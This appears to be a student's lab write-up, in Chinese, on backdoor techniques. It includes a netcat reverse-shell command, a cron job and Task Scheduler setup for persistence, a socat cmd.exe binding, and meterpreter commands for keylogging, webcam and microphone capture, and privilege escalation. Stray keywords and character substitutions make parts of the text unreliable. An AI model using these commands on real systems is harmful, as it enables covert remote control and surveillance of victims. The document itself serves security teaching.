20155219付颖卓《网络对抗技术》后门原理与实践

时间 2019-12-08

标签网络对抗技术后门原理实践栏目 Android 繁體版

原文原文链接

基础问题

(1)例举你能想到的一个后门进入到你系统中的可能方式？linux

计算机安装的某些软件本身就带有后门，在用户不知情的状况下安装好这个软件以后后门就进入了计算机系统。web

或者别人经过一些手段，在你不知情的状况下将后门安装进你的电脑。shell

(2)例举你知道的后门如何启动起来(win及linux)的方式？windows

经过服务机开启一些指令来将其开启。安全

定时启动。定好了启动的时间以后后门在特定时间自动启动tcp

开机自启动工具

用户点击后启动3d

(3)Meterpreter有哪些给你映像深入的功能？blog

获取摄像头行为，感受本身的生活有可能被人随时监视，真的可怕！crontab

(4)如何发现本身有系统有没有被安装后门？

应该多多用杀毒软件进行杀毒，争取作的日日杀毒，然而有些杀毒软件也并不完善，下载那些表完善杀毒软件，而且规范本身的上网行为，不乱点，不乱下载。。。

实验过程记录

1、使用netcat获取主机操做Shell，cron启动

（一）windows获取linux的shell

1.查看主机IP

2.查看虚拟机的IP

3.主机在ncat文件目录下启动监听

4.虚拟机链接主机

5.咱们就在windows下得到一个linux shell，能够运行linux的指令

6.由于linux中的指令是nc 172.20.10.10 5219 -e /bin/sh，因此咱们能够在Windows下面运行linux的指令并获取信息，可是咱们并不能进行通讯，若想进行通讯可在linux下输入指令nc 172.20.10.10 5219

（二）linux获取windows的shell

1.linux启动监听

2.Windows链接linux

3.咱们能够在linux中看到提示

（三）启动cron

1.在linux中输入crontab -e命令来增长定时任务。这条定时任务就是在特定的时间主机和虚拟机会产生链接，在主机上会得到一个shell。我设定的是在每一个小时的第40分钟能够进行链接。

2.在第35分钟以前没法输入命令，等到35分钟时才能够输入命令

2、使用socat获取主机操做Shell, 任务计划启动

socat的基本功能就是创建两个双向的字节流，数据就在其间传输，参数address就是表明了其中的一个方向。所谓流，表明了数据的流向，而数据则能够有许多不一样的类型，命令中也就相应须要许多选项对各类不一样的类型数据流进行限定与说明。

使用socat获取主机操做Shell

1.打开计算机管理工具里的任务计划程序，建立一个新的任务

2.对触发器进行设定，在程序或脚本中选择你的socat.exe文件的路径，在添加参数一栏填写tcp-listen:5219 exec:cmd.exe,pty,stderr，这个命令的做用是把cmd.exe绑定到端口5219，同时把cmd.exe的stderr重定向到stdout上

3.再对操做进行设定

4.启动任务，在虚拟机中链接主机，将主机锁定后从新打开，得到shell

3、使用MSF meterpreter生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

1.在linux下生成后门程序

2.在linux下输入命令ncat.exe -lv 5219 > 5219.exe传输这个后门程序

3.在主机上接收这个后门程序

4.在linux下输入msfconsole进入msf

5.在虚拟机中设置LHOST为虚拟机IP，端口为5210，开启msf监听

6.在主机上运行刚刚接收的后门程序，linux得到win的shell，可对主机执行操做

4、使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

1.获取目标主机当前屏幕界面

使用以下命令：

还有许多别的命令：

使用record_mic指令能够截获一段音频。
使用webcam_snap指令可使用摄像头进行拍照。
使用webcam_stream指令可使用摄像头进行录像。
这两项没法作出，显示错误，多是我历来没用过摄像头的缘故。。。
使用keyscan_start指令开始记录下击键的过程，使用keyscan_dump指令读取击键的记录。
使用getsystem指令进行提权，如图所示，提权成功

实践总结

1.在启动cron这一步时我遇到了一点小问题，个人主机不能执行虚拟机上的命令，试了不少次都失败了，后来才发现计算机上的时间和正确的时间不同，以前我一直按照虚拟机的时间进行操做，然而在这一次我按照计算机上的时间操做就成功了。

2.在任务计划启动那块一开始我建立完任务以后没有启动任务，致使虚拟机这边获取不到win的shell，将任务启动以后就顺利得到了shell

3，通过此次实践事后以为本身的计算机并非百毒不侵的，要提升本身的安全防范意识，要常常进行病毒查杀。

4.以前由于本身的疏忽忘记关防火墙，致使在win10系统内一直没法激活那个后门程序，后来换了xpattacker靶机也不能够，提示什么“不是win32文件”。以后关闭防火墙把后门文件放入本身的主机win10，致使win10系统变得巨慢，开机还有上网都很慢，可是查杀的时候除了本身的病毒也没有别的木马病毒，以后作完实验立马把后门文件删除，重启以后电脑就恢复正常了，有个疑问，为啥本身作的后门病毒也会是电脑变慢？明明本身啥都没作啊QAQ？